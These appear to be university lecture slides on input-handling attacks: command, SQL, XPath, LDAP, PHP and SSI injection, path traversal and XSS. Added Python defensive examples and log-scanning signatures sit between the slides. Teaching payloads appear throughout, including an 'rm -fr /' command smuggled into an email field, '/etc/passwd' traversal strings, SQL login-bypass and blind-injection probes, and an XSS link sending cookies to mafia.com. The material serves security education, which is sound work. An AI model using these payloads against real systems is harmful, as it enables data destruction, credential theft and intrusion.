Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen
Slide 1: Software Security problems
Erik Poll, Digital Security group, Radboud University Nijmegen
Slide 2: Problems with input
- Insecure input handling is the most common security problem, aka lack of input validation, but that terminology is misleading (as we'll see)
- All input is dangerous & evil. All input should be treated as highly poisonous & contagious
- Terminology: input is tainted data
- "Untrusted input" or "untrusted user input" are pleonastic expressions: by default, any input should be untrusted
- Input problems we already saw: buffer overflows, format string attacks, integer overflows
Slide 3: Overview
- Examples of input attacks
- Countermeasures:
  - sandboxing
  - input validation & output encoding
  - tackling the problem at more fundamental levels: LangSec; programming-language support with domain-specific language extensions (Wyvern)
Slide 4: Overview
- OS command injection
- path traversal; chroot jail
- PHP injection, remote and local
- SQL injection; 2nd order SQL injection; blind SQL injection
- HTML injection / XSS; httponly; CSP (Content Security Policy)
- SSI (Server Side Includes) injection
Slide 5: Command injection
A CGI shell script used as part of a website might contain
    cat thefile | mail clientadres
An attacker might enter the address
    erik@cs.ru.nl; rm -fr /
What happens then?
    cat thefile | mail erik@cs.ru.nl; rm -fr /
Can you think of countermeasures?
- validating input (aka sanitising input): removing or escaping dangerous characters, e.g. > < &
- better: check that clientadres is a well-formed address
- reduce the access rights of this CGI script (defense in depth)
- maybe we shouldn't use a scripting language for this?
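The countermeasures listed on slide 5 side by side, as an added Python example (not code from the slides): the slide's unsafe construction, the escaping variant, and the preferred variant that validates the address and then passes it as a single argv element so no shell ever parses it. The address regex is an assumed conservative allowlist, not a full RFC 5322 parser, and `argv_roundtrip` uses the Python interpreter as a stand-in for `mail` so the demonstration runs anywhere.

```python
import re
import shlex
import subprocess
import sys

# Constructed sample inputs: the slide's address and its malicious variant.
GOOD_ADDRESS = "erik@cs.ru.nl"
BAD_ADDRESS = "erik@cs.ru.nl; rm -fr /"

# Assumed "well-formed address" check: only letters, digits and a few
# punctuation characters pass, so shell metacharacters (; | & < > ` $ and
# whitespace) can never reach the command line.  Not a full RFC 5322 parser.
_ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def is_wellformed_address(addr: str) -> bool:
    return _ADDRESS_RE.fullmatch(addr) is not None


def unsafe_command(clientadres: str) -> str:
    """The slide's construction: the address is pasted verbatim into a shell
    command line, so every shell metacharacter in it is interpreted."""
    return f"cat thefile | mail {clientadres}"


def escaped_command(clientadres: str) -> str:
    """Countermeasure 1 (escaping): quote the value so the shell sees one word.
    Still a shell string, but the ';' no longer terminates the command."""
    return f"cat thefile | mail {shlex.quote(clientadres)}"


def mail_argv(clientadres: str) -> list[str]:
    """Countermeasure 2 (validate, then avoid the shell): reject anything that
    is not a well-formed address and pass the value as one argv element."""
    if not is_wellformed_address(clientadres):
        raise ValueError(f"rejected address: {clientadres!r}")
    return ["mail", clientadres]


def address_accepted(clientadres: str) -> bool:
    try:
        mail_argv(clientadres)
        return True
    except ValueError:
        return False


def argv_roundtrip(arg: str) -> str:
    """What a child process sees when a value is passed as an argv element
    instead of through a shell: the whole string, metacharacters included,
    arrives as a single argument and nothing in it is executed."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", arg],
        capture_output=True, text=True, check=True,
    )
    return result.stdout
```

Escaping alone keeps the shell in the loop and depends on getting the quoting right for that shell; validating against an allowlist and using an argv list removes the interpreter from the path entirely, which is why the slide calls it the better option.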
Slide 6: Command injection
Many API calls and language constructs in languages are affected, e.g.
- shell scripts
- C/C++: system(), execvp(), ShellExecute(), ...
- Java: Runtime.exec(), ...
- Perl: system, exec, open, `, /e, ...
- Python: exec, eval, input, execfile, ...
Any use of these constructs merits close attention!
- A basic static analysis tool can easily warn us of their use
- A more advanced tool that does data flow analysis can give more precise warnings, about only those uses that involve user-supplied (aka tainted) arguments, e.g. using PREfast with clumsy [SA_Post(Tainted=SA_Yes)] annotations
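A minimal version of the "basic static analysis tool" from slide 6, as an added example that is not part of the slides: it walks the Python AST for calls to the dangerous constructs listed there (plus `subprocess` entry points called with `shell=True`) and, as a crude stand-in for the data-flow analysis the slide mentions, reports whether the call's arguments are all literal constants or could carry tainted data. The sample program it scans is constructed for this example; `input` is deliberately not flagged because it only evaluated its argument in Python 2.

```python
import ast
from typing import Optional

# Calls that hand a string to an interpreter.  Mirrors the slide's Python list
# (`input` excluded: in Python 3 it no longer evaluates its argument).
DANGEROUS_CALLS = {
    "eval", "exec", "execfile",
    "os.system", "os.popen", "os.execv", "os.execvp", "os.execl",
}
# subprocess entry points are only shell-interpreted when shell=True is passed.
SHELL_WRAPPERS = {
    "subprocess.run", "subprocess.call", "subprocess.check_call",
    "subprocess.check_output", "subprocess.Popen",
}


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Render call targets such as `os.system` or `eval` as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _has_shell_true(call: ast.Call) -> bool:
    return any(
        kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True
        for kw in call.keywords
    )


def _possibly_tainted(call: ast.Call) -> bool:
    """Crude taint heuristic: arguments that are all literal constants cannot
    carry user input; anything else (variables, concatenations) might."""
    return any(not isinstance(arg, ast.Constant) for arg in call.args)


def find_dangerous_calls(source: str) -> list[tuple[int, str, bool]]:
    """Return (line, call name, possibly_tainted) for every suspicious call."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        if name in DANGEROUS_CALLS:
            findings.append((node.lineno, name, _possibly_tainted(node)))
        elif name in SHELL_WRAPPERS and _has_shell_true(node):
            findings.append((node.lineno, f"{name}(shell=True)", _possibly_tainted(node)))
    return sorted(findings)


# Constructed program to scan (not code from the slides).
SAMPLE_SOURCE = """\
import os, subprocess
name = input("recipient? ")
os.system("ls -l")
os.system("mail " + name)
subprocess.run(["mail", name])
subprocess.run("mail " + name, shell=True)
eval(name)
"""
```

On `SAMPLE_SOURCE` the scanner flags lines 3, 4, 6 and 7; line 3 is reported with a constant argument only, which is the kind of hit a data-flow-aware tool would suppress, while line 5 (an argv list, no shell) is not reported at all.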
Slide 7: Path traversal (aka directory traversal)
File names constructed from user input, esp. by string concatenation, can cause problems. E.g. suppose a program uses the paths
    1. "/usr/local/client-info/" ++ username
    2. "/usr/local/profilepictures/" ++ username ++ ".jpg"
Malicious usernames for an attacker to inject:
    1. ../../../etc/passwd
    2. ../../../etc/passwd%00
The null terminator %00 means the suffix .jpg will be ignored.
NB Validating file names is difficult (more on that later): reuse existing code!
Additional countermeasure: restrict file access using a chroot jail
Slide 8: chroot jail
- chroot (change root) restricts access of a process to a subset of the file system, i.e. it changes the root of the file system for that process. This is a form of sandboxing.
- E.g. run an application you just downloaded with
      chroot /home/sos/erik/trial ; /tmp
  to restrict access to just these two directories
- Using the traditional OS access control permissions for this, instead of chroot, would be very tricky: it would require getting permissions right all over the file system
Slide 9: Fun with path traversal
Attacker can
- look around on the file system for useful information, e.g. configuration or password files
- access special files to cause Denial-of-Service (DoS), e.g.
      ../../dev/random       (is very long to read)
      ../../var/spool/lpr    (is impossible to read)
- get the application to write info in a place the attacker can access, to then read or modify it, e.g. /mnt/usbkey or /tmp/file
- get the application to use, ideally execute, data on the target system that the attacker can control (see PHP examples later on)
Note that this includes attacks on confidentiality, availability, and integrity
Slide 10: Path traversal example [thanks to Arne Swinnen]
Where would you try a path name injection on https://instagram.com/?hl=en ?
Slide 11: (screenshot)
Slide 12: Strange input leads to the Dutch page. Why?
Slide 13: (screenshot)
Slide 14:
- Enter fuzzdb, to fuzz common file names
- Fuzzdb finds 42 hits for ../<guess>/../locale/nl/
- Facebook bug bounty program paid Arne $500
- More Instagram flaws at …
Slide 15: Injection attacks on PHP
PHP code can dynamically include other files, e.g. based on an option chosen from a menu on a webpage
    $dir = $_GET['option'];
    include($dir . "/function.php");
So for a URL with option=1 the webserver will execute <current_directory>/1/function.php
Note: here option is a parameter in the URL, and . denotes string concatenation in PHP
Slide 16: Injection attacks on PHP
1. option=../../somedir/anotherdir
   Attacker can execute any file called function.php on the server
2. option=../../somedir/anyfile.php%00
   Attacker can execute any file on the server
3. option=../../john/profilepicture.jpg%00
   John's profile picture will be executed as PHP code, so attacker John can execute his own PHP code if he has an account. NB this illustrates how evil can spread with input!
4. option=… (a URL)
   A poorly configured PHP web server will now dynamically load PHP code over the web
1-3 are Local File Inclusion (LFI), 4 is Remote File Inclusion (RFI)
Note that 1 & 2 are like return-to-libc attacks, but for PHP instead of C.
Slide 17: Countermeasure: indirect selection
Don't use the user input to construct a value, but use it to select from a set of legitimate values, e.g.
    $dir = $_GET['option'];
    if ($dir == 1) {
        include("1/function.php");
    } else if ($dir == 2) {
        include("2/function.php");
    } else {
        ... // include nothing, or report an error?
    }
Downsides? More work, less flexible, and does not work in all situations.
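Two defences for the file-name problems of slides 7 and 15-17, as an added Python example (not code from the slides): a containment check that canonicalises the joined path and refuses anything that leaves the base directory or carries a NUL byte, next to the indirect-selection table of slide 17. The base directory is an assumed location under the system temp dir (the slides use /usr/local/client-info/), and the candidate names are the slides' own payloads.

```python
import os
import tempfile
from urllib.parse import unquote

# Assumed base directory for the demo (the slide uses /usr/local/client-info/).
BASE_DIR = os.path.join(tempfile.gettempdir(), "client-info")


def safe_join(base_dir: str, untrusted_name: str) -> str:
    """Resolve base_dir/untrusted_name and refuse anything that does not stay
    inside base_dir.  Catches ../ sequences, absolute names (os.path.join
    silently discards the base for those) and embedded NUL bytes (%00)."""
    if "\x00" in untrusted_name:
        raise ValueError("NUL byte in file name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, untrusted_name))
    # commonpath() compares path components, not string prefixes, so a
    # sibling directory such as /tmp/client-info-evil does not pass.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes {base}: {candidate}")
    return candidate


def classify(base_dir: str, names: list[str]) -> dict[str, str]:
    """Map each candidate file name to 'ok' or 'rejected' for the given base."""
    verdicts = {}
    for name in names:
        try:
            safe_join(base_dir, name)
            verdicts[name] = "ok"
        except ValueError:
            verdicts[name] = "rejected"
    return verdicts


# Constructed candidates: a normal user name plus the slides' payloads.  The
# %00 variant is URL-decoded first, as a web server would do before the
# application sees it.
DEMO_NAMES = [
    "erik",
    "../../../etc/passwd",
    unquote("../../../etc/passwd%00"),
    "/etc/passwd",
]

# Indirect selection (slide 17): the option only picks from a fixed table and
# never becomes part of the path itself.
INCLUDE_TABLE = {"1": "1/function.php", "2": "2/function.php"}


def select_include(option: str) -> str:
    try:
        return INCLUDE_TABLE[option]
    except KeyError:
        raise ValueError(f"unknown option {option!r}") from None
```

The containment check accepts any name that stays under the base, including new users the table does not know about, which is exactly the flexibility slide 17 notes the table approach lacks; the price is that the check must be applied at every file access, and `realpath` follows symlinks, so a link inside the base pointing outside it is still rejected.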
Slide 18: (image only)
Slide 19: SQL injection
Login form: Username erik, Password ******
Slide 20: SQL injection
    $result = mysql_query("SELECT * FROM Accounts " .
                          "WHERE Username = '$username' " .
                          "AND Password = '$password';");
    if (mysql_num_rows($result) > 0) $login = true;
Slide 21: SQL injection
Resulting SQL query:
    SELECT * FROM Accounts WHERE Username = 'erik' AND Password = 'secret';
Slide 22: SQL injection
Login form: Username ' OR 1=1;/* , Password ******
Slide 23: SQL injection
Resulting SQL query:
    SELECT * FROM Accounts WHERE Username = '' OR 1=1;/* AND Password = 'secret';
Slide 24: SQL injection
Resulting SQL query:
    SELECT * FROM Accounts WHERE Username = '' OR 1=1; /* AND Password = 'secret';
Oops!
Slide 25: Variation: SQL Database Command Injection
- Injecting an SQL command with ; rather than manipulating an SQL query with '
- Highly dependent on infrastructure, e.g.
  - Each database has its own commands, e.g. Microsoft SQL Server has exec master.dbo.xp_cmdshell
  - Some configurations don't allow use of ;, e.g. an Oracle database accessed via Java or PL/SQL
Slide 26: Variation: Function Call Injection
Oracle SQL has over 1000 built-in functions to use in queries, e.g. TRANSLATE:
    TRANSLATE('a1b2ff', 'abcdef', 'ABCDEF') = 'A1B2FF'
Arguments of such functions may be poisoned with other functions, e.g.
    SELECT TRANSLATE('<user input>', 'abcd', 'ABCD') FROM ...
can become
    SELECT TRANSLATE('' || UTL_HTTP.REQUEST('…') || '', 'abcd', 'ABCD') FROM ...
Here UTL_HTTP does an HTTP request directly from the Oracle database, which is running behind the company firewall...
Slide 27: Example: 2nd order SQL injection
Suppose I want to access tanja's account
1. I register an account myself with the name tanja' --
2. I log in as tanja' -- and change my password
3. If the password change is done with the SQL statement
       UPDATE users SET password='abcd1234' WHERE username='tanja' --' and password='abc'
   then I have reset tanja's password
Here abcd1234 is user input, but the dangerous input to the statement comes from the server's own database, where it was injected earlier.
The moral of the story: don't trust any input, not even data coming from sources you think you can trust
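The login query of slides 20-24 and the second-order scenario of slide 27 replayed against an in-memory SQLite database, as an added example that is not code from the slides: each statement is shown once built by string concatenation (the slides' construction) and once parameterised, and `second_order_demo` reports whether the real tanja's password was overwritten. Table and column names follow slide 20 (`Accounts`, `Username`, `Password`) for both scenarios; the account data is constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the slides' MySQL table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts (Username TEXT PRIMARY KEY, Password TEXT)")
    conn.executemany("INSERT INTO Accounts VALUES (?, ?)",
                     [("erik", "secret"), ("tanja", "abc")])
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Slide 20's query built by concatenation: the input becomes SQL syntax."""
    query = ("SELECT * FROM Accounts "
             f"WHERE Username = '{username}' "
             f"AND Password = '{password}';")
    return len(conn.execute(query).fetchall()) > 0


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the statement, so a
    quote in the input is just a character inside a string value."""
    rows = conn.execute(
        "SELECT * FROM Accounts WHERE Username = ? AND Password = ?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


def register(conn, username: str, password: str) -> None:
    """Registration stores the name safely; the 2nd order problem arises only
    when the stored name is later concatenated into another statement."""
    conn.execute("INSERT INTO Accounts VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, username: str, old: str, new: str) -> int:
    stmt = (f"UPDATE Accounts SET Password='{new}' "
            f"WHERE Username='{username}' and Password='{old}'")
    return conn.execute(stmt).rowcount


def change_password_safe(conn, username: str, old: str, new: str) -> int:
    return conn.execute(
        "UPDATE Accounts SET Password=? WHERE Username=? AND Password=?",
        (new, username, old),
    ).rowcount


def second_order_demo(safe: bool) -> dict[str, bool]:
    """Slide 27: register tanja' --, then change that account's password.
    With concatenation the trailing -- comments out the rest of the WHERE
    clause and the UPDATE hits the real tanja instead of the attacker."""
    conn = make_db()
    attacker = "tanja' --"
    register(conn, attacker, "xyz")
    change = change_password_safe if safe else change_password_vulnerable
    change(conn, attacker, "xyz", "abcd1234")
    return {
        "tanja_reset": login_safe(conn, "tanja", "abcd1234"),
        "attacker_changed": login_safe(conn, attacker, "abcd1234"),
    }
```

The parameterised version needs no escaping of the stored name at all, which is the practical answer to slide 27's moral: data that came out of your own database still goes into the next statement as a value, never as text.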
Slide 28: Blind SQL injection
Suppose ../items.php?id=2 results in the SQL injection-prone query
    SELECT title, body FROM items WHERE id=2
Will we see a different response to the URLs below?
    1. ../items.php?id=2 AND 1=1
    2. ../items.php?id=2 AND 1=2
What will be the result of
    ../items.php?id=2 AND SUBSTRING(user,1,1) = 'a'
The same as 1 iff user starts with a; otherwise the same as 2! So we can use this to find out things about the database structure & content!
Slide 29: Blind SQL injection
- Blind SQL injection: an SQL injection where not the response itself is interesting, but the type of the response, or the lack of a response, leaks information to an attacker
- Errors can also leak interesting information: e.g. for
      IF <some condition> SELECT 1 ELSE 1/0
  the error message may reveal if <some condition> is true
- More subtle than this, the response time may still leak information:
      ... IF(SUBSTRING(user,1,1) = 'a', BENCHMARK(50000, …), null) ...
  the time-consuming BENCHMARK statement is only executed if user starts with a
Slide 30: More injection possibilities
- 2nd order SQL injection: user input, e.g. a username, containing a malicious SQL fragment does not cause harm on first use, but is stored in the server to cause problems later. Moral: don't trust anything!
- Blind SQL injection: the response time or error message of a tainted SQL query leaks information (a so-called side channel attack)
- XPath injection on XML data: corrupt an XPath query to access XML data, e.g. with ' or '1'='1'
- LDAP injection: corrupt an LDAP query sent to the LDAP server, the central repository of user info in corporate environments, e.g. with admin)(&)
- Not to mention blind XPath injection, 2nd order blind LDAP injection, etc. etc.
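The blind-injection probes of slides 28-29 leave a recognisable trail in the web server's access log even when the responses themselves reveal nothing, so the defender's counterpart to those slides is a log scan. This added example (not code from the slides) runs a small set of signatures over constructed Common Log Format lines whose request targets mirror the payloads from slides 7, 28-30 and 35; the log lines, the IP addresses and the signature set are all assumptions for the demonstration, and a production detector would need far more rules and a lower false-positive rate than a few regexes give.

```python
import re
from urllib.parse import unquote_plus

# Constructed access log lines (Common Log Format); none are real traffic.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /items.php?id=2 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /items.php?id=2%20AND%201=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /items.php?id=2%20AND%201=2 HTTP/1.1" 200 77',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /items.php?id=2%20AND%20SUBSTRING(user,1,1)=%27a%27 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /items.php?id=2%20AND%20IF(SUBSTRING(user,1,1)=%27a%27,BENCHMARK(50000,1),null) HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /profile?name=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 404 0',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search?q=%3Ch1%3Esos%3C%2Fh1%3E HTTP/1.1" 200 311',
    '192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /search?q=sos HTTP/1.1" 200 301',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# (label, regex) pairs applied to the URL-decoded request target.
SIGNATURES = [
    ("sqli-boolean",   re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+\b", re.I)),
    ("sqli-blind",     re.compile(r"\b(?:SUBSTRING|BENCHMARK|SLEEP)\s*\(", re.I)),
    ("sqli-comment",   re.compile(r"/\*|--\s|--$")),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("nul-byte",       re.compile("\x00")),
    ("html-injection", re.compile(r"<\s*/?\s*[a-z][a-z0-9]*[\s>/]", re.I)),
]


def decode_target(line: str):
    """Extract the request target and URL-decode it.  Decoding twice catches
    double-encoded payloads (%2527 -> %27 -> ') that a single pass would miss."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    return unquote_plus(unquote_plus(m.group("target")))


def scan_line(line: str) -> list[str]:
    target = decode_target(line)
    if target is None:
        return []
    return [label for label, rx in SIGNATURES if rx.search(target)]


def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map 1-based line numbers of suspicious requests to their matched labels."""
    return {i: labels for i, line in enumerate(lines, 1) if (labels := scan_line(line))}
```

Matching on the decoded target rather than the raw line is what makes the %00 and %2F payloads visible at all; the sequence of near-identical `id=2 AND ...` requests from one client with differing response sizes (512 versus 77 bytes) is the boolean-inference pattern slide 28 describes, and is worth correlating even when no single signature fires.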
Slide 31: XPath injection
XML data, e.g.
    <student_database>
      <student><username>jan</username><passwd>abcd1234</passwd></student>
      <student><username>kees</username><passwd>geheim</passwd></student>
    </student_database>
can be accessed by XPath queries, e.g.
    //student[username/text()='jan' and passwd/text()='abcd123']/account/text()
which can be corrupted by malicious input such as ' or '1'='1'
Slide 32: LDAP injection
An LDAP query sent to the LDAP server to authenticate a user
    (&(USER=jan)(PASSWD=abcd1234))
can be corrupted by giving as username admin)(&), which results in
    (&(USER=admin)(&))(PASSWD=pwd)
where only the first part is used, and (&) is LDAP notation for TRUE.
There are also blind LDAP injection attacks.
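Neither LDAP filters nor XPath 1.0 offer parameterised queries, so the defence for slides 31-32 is correct encoding of the value before it is placed in the query. This added example (not code from the slides) escapes LDAP filter values per RFC 4515 and builds XPath string literals with the `concat()` construction for values that contain both quote characters; the query shapes are the slides' own, the escaping functions and the `concat()` technique are added here.

```python
# RFC 4515 escaping for values placed inside an LDAP search filter.  Backslash
# is handled first so that escapes produced later are not escaped again.
_LDAP_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def ldap_escape(value: str) -> str:
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def auth_filter_unsafe(user: str, pwd: str) -> str:
    """The slide's construction: values pasted straight into the filter, so a
    username containing ')(' rewrites the filter structure."""
    return f"(&(USER={user})(PASSWD={pwd}))"


def auth_filter_safe(user: str, pwd: str) -> str:
    """Parentheses in the value become \\28 and \\29 and stay inside the
    attribute value; the filter keeps exactly two assertions."""
    return f"(&(USER={ldap_escape(user)})(PASSWD={ldap_escape(pwd)}))"


def xpath_literal(value: str) -> str:
    """Render an arbitrary string as an XPath 1.0 string literal.  XPath has no
    escape sequences: use the quote kind the value lacks, and when it contains
    both, stitch single-quoted pieces together with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = ", \"'\", ".join(f"'{p}'" for p in value.split("'"))
    return f"concat({pieces})"


def student_query(username: str, passwd: str) -> str:
    """Slide 31's query with both values rendered as proper literals."""
    return (f"//student[username/text()={xpath_literal(username)} "
            f"and passwd/text()={xpath_literal(passwd)}]/account/text()")
```

With the slide's `' or '1'='1` payload the XPath value is emitted inside double quotes, so the predicate compares `passwd` against that exact string instead of gaining an always-true disjunct; the LDAP payload `admin)(&)` likewise stays one opaque attribute value.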
Slide 33: HTML injection
Search box input: sos
Result: No matches found for sos
Slide 34: HTML injection
Search box input: <h1>sos</h1>
Result: No matches found for sos (the injected <h1> tags are interpreted as HTML by the browser)
Slide 35: HTML injection
Search box input: <h1>sos</h1>
Result: No matches found for <h1>sos</h1>
If the application escapes dangerous characters, e.g. by replacing < by &lt;, then HTML tags will not be interpreted as HTML
Slide 36: HTML injection & XSS
- Web server returns HTML code injected by the user
- Attacker can abuse this by letting the server return his HTML content to other users:
  - by sending victims a link that will echo his HTML code (reflected HTML injection)
  - by posting HTML content on the server, e.g. a web forum (stored HTML injection)
- If the injected HTML contains scripts, this is called XSS (Cross Site Scripting). These scripts are executed in the browser on the victim's machine, using the victim's access rights!
- The attacker can perform actions inside the victim's browser, or try to steal information (esp. session cookies)
Slide 37: Example: Reflected XSS attack via error message
Suppose accessing … returns a webpage with the text "Page not found". This error page may allow a reflected XSS attack: accessing … may produce a webpage with a pop-up window.
An attacker could exploit this to steal cookies, by sending people a link containing
    …ookiestealer.php?cookie='+document.cookie</script>
to pass the ru.nl cookie as a parameter in an HTTP request to mafia.com
Slide 38: Protection measures for XSS
- httponly cookies: prevents any javascript from accessing cookies, to stop XSS attacks stealing cookies
- CSP (Content Security Policy): a policy that whitelists trusted sources that are allowed in a page, enforced by the browser
Some protection, but not against XSS:
- secure cookies: prevents any network eavesdropper from observing cookies, by only sending them over https
- SOP (Same Origin Policy): prevents javascript in 3rd party content in a webpage from accessing the rest of the page
These are no help whatsoever against (stored or reflected) XSS.
Slide 39: CSP example
A webpage from bank.com could contain the CSP header
    Content-Security-Policy: default-src 'self'; img-src 'self' disney.com; child-src https://youtube.com; script-src apis.google.com
to only allow
- images from bank.com itself or from disney.com
- embedded frames from youtube, included via https
- scripts from apis.google.com
This is a form of sandboxing, in this case enforced by the browser.
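The three browser-side measures of slides 35, 38 and 39 in one added Python example (not code from the slides): output encoding of the search term, a `Set-Cookie` header carrying the HttpOnly and Secure attributes, and a small evaluator for the bank.com policy that shows how a browser resolves a directive. The evaluator is a deliberate simplification (host and scheme://host sources only; no wildcards, ports, paths, nonces or hashes), and the cookie value is constructed.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit


def render_search_result(user_query: str) -> str:
    """Output encoding (slide 35): < > & and quotes become entities, so an
    injected tag is displayed as text instead of being parsed as HTML."""
    return f"No matches found for {html.escape(user_query)}"


def session_cookie_header(value: str) -> str:
    """Set-Cookie value with the attributes from slide 38."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True   # hidden from document.cookie
    jar["session"]["secure"] = True     # only sent over https
    return jar.output(header="").strip()


def parse_csp(header_value: str) -> dict[str, list[str]]:
    """'default-src 'self'; img-src 'self' disney.com' -> {directive: sources}."""
    policy = {}
    for directive in header_value.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def csp_allows(policy: dict, directive: str, url: str, page_origin: str) -> bool:
    """Simplified source matching (assumption: host or scheme://host sources
    only).  A fetch directive that is absent falls back to default-src; one
    that is present replaces default-src entirely, it does not extend it."""
    sources = policy.get(directive, policy.get("default-src", []))
    parts = urlsplit(url)
    origin = f"{parts.scheme}://{parts.hostname}"
    for src in sources:
        if src == "'none'":
            return False
        if src == "'self'" and origin == page_origin:
            return True
        if "://" in src and origin == src.rstrip("/"):
            return True
        if "://" not in src and parts.hostname == src:
            return True
    return False


# The slide's bank.com policy.
BANK_CSP = ("default-src 'self'; img-src 'self' disney.com; "
            "child-src https://youtube.com; script-src apis.google.com")
```

One consequence worth noticing: because `script-src apis.google.com` replaces `default-src 'self'` rather than adding to it, this policy also blocks scripts served from bank.com itself, which is why a real deployment would list `'self'` in `script-src` explicitly; the `font-src` case shows the fallback to `default-src` for a directive the header does not mention.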
Slide 40: SSI injection
Server-Side Includes (SSI) are instructions for a web server written inside HTML. For instance, to include some file:
    <!--#include file="header.html" -->
If an attacker can inject HTML into a webpage, then he can try to inject an SSI directive that will be executed on the server.
NB: with SSI injection the injected code is executed server-side, whereas with XSS the injected javascript is executed client-side.
Of course, there is a directive to execute programs & scripts:
    <!--#exec cmd="rm -fr /" -->
Slide 41: More injection problems: OWASP list
- Blind SQL Injection
- Blind XPath Injection
- Code Injection
- Command Injection
- Comment Injection Attack
- Content Spoofing
- CORS RequestPreflightScrutiny
- Cross-site Scripting (XSS)
- Custom Special Character Injection
- Direct Dynamic Code Evaluation ('Eval Injection')
- Format string attack
- Full Path Disclosure
- Function Injection
- LDAP injection
- Parameter Delimiter
- PHP Object Injection
- Regular expression Denial of Service - ReDoS
- Resource Injection
- Server-Side Includes (SSI) Injection
- Special Element Injection
- SQL Injection
- SQL Injection Bypassing WAF
- Web Parameter Tampering
- XPATH Injection
Slide 42: More injection problems: CWE classification
Several categories & clusters in the CWE classification, e.g.
- CWE-20 Improper Input Validation
- CWE-896 Tainted Input
distinguish a few dozen variants of input attacks. See …
Slide 43: CWE/SANS Top 25 (out of 732!) [Version 3.0]
- Improper Neutralization of Special Elements used in an SQL Command ...
- ... ('OS Command Injection')
- Buffer Overflow ...
- ... ('Cross-site Scripting')
- Missing Authentication for Critical Function
- Missing Authorization
- Use of Hard-coded Credentials
- Missing Encryption of Sensitive Data
- Unrestricted Upload of File with Dangerous Type
- Reliance on Untrusted Inputs in a Security Decision
- Execution with Unnecessary Privileges
- Cross-Site Request Forgery (CSRF)
- ... ('Path Traversal')
- Download of Code Without Integrity Check
- Incorrect Authorization
- Inclusion of Functionality from Untrusted Control Sphere
- Incorrect Permission Assignment
- Use of Potentially Dangerous Function
- Use of a Broken or Risky Cryptographic Algorithm
- Incorrect Calculation of Buffer Size
- Improper Restriction of Excessive Authentication Attempts
- URL Redirection to Untrusted Site ('Open Redirect')
- Uncontrolled Format String
- Integer Overflow or Wraparound
- Use of a One-Way Hash without a Salt
More informationSAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0
Welcome BIZEC Roundtable @ IT Defense, Berlin SAP Security BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0 February 1, 2013 Andreas Wiegenstein CTO, Virtual Forge 2 SAP Security SAP security is a complex
More informationCHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS
180 CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS 8.1 SUMMARY This research has focused on developing a Web Applications Secure System from Code Injection Vulnerabilities through Web Services (WAPS-CIVS),
More informationPROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationCIS 700/002 : Special Topics : OWASP ZED (ZAP)
CIS 700/002 : Special Topics : OWASP ZED (ZAP) Hitali Sheth CIS 700/002: Security of EMBS/CPS/IoT Department of Computer and Information Science School of Engineering and Applied Science University of
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More informationWeb Security: Vulnerabilities & Attacks
